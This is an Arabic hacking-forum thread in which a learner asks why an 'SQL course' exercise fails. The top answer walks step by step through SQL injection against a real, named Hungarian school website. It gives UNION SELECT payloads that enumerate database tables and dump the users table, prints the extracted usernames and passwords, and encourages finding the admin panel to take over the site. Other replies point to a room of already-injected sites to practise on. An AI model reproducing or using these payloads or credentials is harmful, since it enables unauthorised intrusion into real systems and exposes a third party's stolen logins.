06-25-2012, 04:29 PM | رقم المشاركة : 1 (permalink) |
مجاب: سؤال بسيط فى دورة sql انا وصلت لدرس الثامن بطبق نفسى الى هنالك بيقولى ايرور وجبت العواميد وكلة صح Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC schg fsd' tn ],vm sql | |
|
أفضل جواب - كتبه TIKTAKram |
أخي الكريم، للأسف يظهر أنك لا زلت مبتدأ في الـSQL مازال الوقت طويل أمامك راح تكون هذه آخر مساعدة أقدر أعملهالك و راح أشرح لك حقن هذا الموقع خطوة خطوة بدون أي صعوبة لنبدأ على بركة الله : الموقع مصاب و الدليل لما نضع الـ(') شوف : ['CODE]http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=1 [/CODE] الآن راح نشوف عدد الأعمدة عن طريق الأمر order by و راح نجد العمود المصاب هو 1 و العمود يظهر يسار الصفحة كأنه عنوان و هذه هي الحقنة لحد الآن : كود: http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8-- نطبق الحقنة التالية مباشرة، لاحظ جيدا : كود: http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(table_name,0x3a,column_name,0x3a,table_schema),2,3,4,5,6,7,8+from+information_schema.columns-- كود: http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(table_name,0x3a,column_name,0x3a,table_schema),2,3,4,5,6,7,8+from+information_schema.columns+where+column_name+like+CHAR(37, 112, 97, 115, 37)-- الآن نروح لسورس الصفحة و نشوف راح نجد المعلومات التالية : users:passwd:berze_web يعني أن إسم الجدول هو users و إسم العمود هو passwd الآن نكمل الحقنة و راح تصير هكذا : كود: http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(table_name,0x3a,column_name,0x3a,table_schema),2,3,4,5,6,7,8+from+information_schema.columns+where+table_name=0x7573657273-- login_name و passwd و الآن نكمل حقنتنا عادي جدا، و نستخرج الباسوارد و اليوزر من خلال تكملة الحقنة لاحظ : كود: http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(login_name,0x3a,passwd),2,3,4,5,6,7,8+from+users-- user1 = rlaci pass1= chipchip user2= www pass2= HEkbY3U6 الآن يبقى عليك تبحث عن مسار لوحة التحكم و تخترق الموقع و مبروك عليك للأسف بحثت على اللوحة بسرعة لكن لم أجدها سامحني ليس لي الوقت لأقوم بفحص ملفات الموقع هذا كل لي أقدر أساعدك فيه، و الله كتبت حتى التعب ههههه لكن مو غالي عنك بالتوفيق إن شاء الله تحيتي ... |
06-25-2012, 08:24 PM | رقم المشاركة : 2 (permalink) | ||
رد: سؤال بسيط فى دورة sql السلام عليكم و رحمة الله و بركاته
| |||
|
06-25-2012, 08:58 PM | رقم المشاركة : 4 (permalink) | ||
رد: سؤال بسيط فى دورة sql الانترنت عندي ضعيف جدا عشان ماقدرتش احقنه واعرف وين المشكله
| |||
|
06-25-2012, 09:18 PM | رقم المشاركة : 6 (permalink) | ||
رد: سؤال بسيط فى دورة sql ادخل غرفة الحقن تلاقي مواقع مصابه ومحقونه ادرب عليها
| |||
|
06-25-2012, 09:49 PM | رقم المشاركة : 8 (permalink) | |||||||||||||||||||||||||
رد: سؤال بسيط فى دورة sql
| ||||||||||||||||||||||||||
|
06-25-2012, 10:29 PM | رقم المشاركة : 10 (permalink) | ||
رد: سؤال بسيط فى دورة sql
| |||
|
06-25-2012, 11:00 PM | رقم المشاركة : 11 (permalink) |
رد: سؤال بسيط فى دورة sql انا مش عايز بردو شوفلى اية الغلط | |
|
06-25-2012, 11:05 PM | رقم المشاركة : 12 (permalink) | ||
رد: سؤال بسيط فى دورة sql عودة من جديد
| |||
|
06-25-2012, 11:10 PM | رقم المشاركة : 14 (permalink) | ||
رد: سؤال بسيط فى دورة sql يا أخي لا تقلق، نحن هنا للمساعدة
| |||
|
06-25-2012, 11:19 PM | رقم المشاركة : 15 (permalink) |
رد: سؤال بسيط فى دورة sql بوص انا اهوة استخدمت | |
|
مواقع النشر (المفضلة) |
أدوات الموضوع | |
انواع عرض الموضوع | |
|
|